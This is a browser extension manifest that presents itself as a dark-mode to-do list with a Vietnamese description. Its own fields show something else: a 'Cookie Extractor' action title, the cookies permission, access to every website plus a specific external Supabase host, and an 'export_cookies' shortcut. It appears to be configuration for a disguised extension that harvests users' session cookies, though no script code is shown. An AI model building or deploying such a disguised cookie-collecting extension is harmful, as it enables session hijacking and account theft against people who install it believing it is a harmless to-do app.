{
  "manifest_version": 3,
  "name": "Todolist (Dark Mode)",
  "version": "1.0",
  "description": "Tạo todolist và tự động sắp xếp theo ngày giờ.",
  "action": {
    "default_popup": "popup.html",
    "default_title": "Cookie Extractor"
  },
  
  "background": {
    "service_worker": "background.js"
  },
  "permissions": [
    "cookies",
    "tabs",
    "activeTab",
    "storage",
    "alarms",
    "downloads",
    "notifications"
  ],
  "host_permissions": [
    "http://*/*",
    "https://*/*",
    "https://jvnxieddmgmoiqfwofpq.supabase.co/*"
  ],
  "commands": {
    "export_cookies": {
      "suggested_key": {
        "default": "Ctrl+Shift+E",
        "mac": "Command+Shift+E"
      },
      "description": "Export cookies for current domain"
    }
  }
  
}

